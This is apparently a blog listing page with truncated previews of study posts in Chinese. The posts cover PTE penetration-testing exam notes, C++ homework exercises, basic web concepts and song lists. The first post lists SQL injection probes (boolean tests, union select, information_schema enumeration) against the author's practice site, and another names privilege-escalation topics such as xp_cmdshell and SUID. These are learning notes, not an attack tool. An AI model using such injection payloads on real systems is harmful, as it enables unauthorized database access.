PTE学习第二天
sql注入常见分类
’
" 字符型注入
整数型注入
1234567891011?id=1select * from users where id = 1 #select * from users where id = 1 union select * from users?id=1?id=1'?id=1"?id=1 and 1=1?id=1 and 1=2
12345678910111213http://hazelshishuaige.club:28199/?id=1 and 1=2http://hazelshishuaige.club:28199/?id=1.1 or 1=1http://hazelshishuaige.club:28199/?id=1.1 union select 1,2http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(schema_name) from information_schema.schematahttp://hazelshis ...
PTE学习第一天
100
20分理论题目
80分实操题目
20分理论
基础知识的积累
50 + 30
50 小题。5个题目 5个key。
sql注入
文件上传
命令执行
文件包含
cookie
xss
30 综合大题。3个key
综合渗透
web挖掘漏洞 端口渗透
webshell
权限提升
windows提权。sqlserver xp_cmdshell
linux提权 suid
请求包:
1234567891011GET /challenges HTTP/1.1Host: hazelshishuaige.club:8000Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im ...
编程日记7
题目1
【问题描述】
判断用户输入的整数和字符串(不超过100字符)是否为回文。
【输入输出形式】
Enter an integer:12321
12321 is a symmetry!
Enter a string:howoh
howoh is a symmetry!
【样例输入输出】
Enter an integer:45678
45678 is not a symmetry!
Enter a string:what
what is not a symmetry!
【样例说明】
其中:Enter an integer:为输出提示,12321为用户输入的整数;
字符串类似:Enter a string:为输出提示,what为用户输入的字符串
【代码】
123456789101112131415161718192021222324252627282930313233343536373839404142#include <iostream>#include <string.h>#include <stdio.h>using namespace ...
一些舞蹈 ~ ~
Shut Down
Pink Venom
Pretty Savage
Lovesick Girls
How You Like That
Kill This Love
DDU-DU DDU-DU
编程日记6
题目1
【问题描述】
给定n个同学的身高(均为100到200之间的正整数),求超过平均身高的同学人数。
【输入形式】
包括两行数据。
第一行包含一个整数n。
第二行包含n个用空格隔开的正整数。
【输出形式】
一行,这一行只包含一个整数,表示超过平均身高的同学人数。
【样例输入】
6
160 155 170 175 172 164
【样例输出】
3
【代码】
1234567891011121314151617181920212223242526272829#include<iostream>#include<iomanip>using namespace std;int main(){ int n,s,c; float av=0; c=s=0; cin>>n; int a[n]; for(int i=0; i<n; i++) { cin >> a[i]; } for(int i=0;i<n;i++) { s=s ...
Ava Max
My Head & My Heart
web安全-编程基础学习一
HTML标记语言
www.baidu.com/s?wd=123- - - - 百度请求的URL地址栏中输入的地址
123 - - - - -统称为用户需求
后端的基本组成成分
HTML- - - -后端的脚本语言
C类语言- - - - 前端
家- - - - 存储数据,队列存储一些缓存数据
存储桶- - - -存放数据的容器
1、数据库(只存放一些字符串 文本类型的数据)
2、对象存储(存放一些非字符串的数据- - exe、阿里云oss)
127.0.0.1
DNS- - - 域名解析系统
www.baidu.com - -域名 - -便于用户记住
URL - - - -格式:
协议://ip[域名]:端口[默认配置为80]/Resource_Path资源路径
http://127.0.0.1
HTML是一个标记语言,不能按照用户的需求进行展示。
PHP - - -完善HTML的缺陷,可以获取用户的需求(输入)
1、字符串String: http://127.0.0.1
2、整数int:1
3、浮点数float:3.14
4、逻辑bool:true、fals ...
编程日记5
题目1
【问题描述】
输入一维数组,将数组中相同的数只保留一个,并输出该数组
【输入形式】
输入数组元素个数n和相应的数组元素
【输出形式】
输出该数组,相同的数只保留一个
【样例输入】
input n of array:15
input numbers of array:12 33 22 12 15 18 33 33 22 22 17 16 3 5 6
【样例输出】
12 33 22 15 18 17 16 3 5 6
【样例说明】
输出的每个数组元素用setw(4)设置域宽
【代码】
12345678910111213141516171819202122232425262728293031#include<iostream>#include<iomanip>using namespace std;int main(){ cout<<"input n of array:"; int n,d; d=0; cin>>n; int a[n]; ...
疯狂动物城+
第一集第二集第三集第四集第五集第六集
编程日记4
题目1
【题目描述】
从键盘输入10个数,存入数组中,依次输出数组元素并统计其中的正数之总和。(要求使用数组)
【输入格式】
在一行中输入10个数
【输出格式】
前两行输出数组元素值,每个元素占8个字符位置,要求左对齐,每行输出5个元素值,共两行。
第三行输出正数和,格式为:sum=…,输出完毕后换行。
【输入样例】
在这里给出一组输入。例如:
12 45 -23 33 -87 20 7 -111 0 43
【输出样例】
在这里给出相应的输出。例如:
12 45 -23 33 -87
20 7 -111 0 43
sum=160
【代码】
123456789101112131415161718192021#include<iostream>#include <iomanip>using namespace std; int main() {int a[10] ;int j=0;int q=0;for(int i=1; i<11; i++) { ...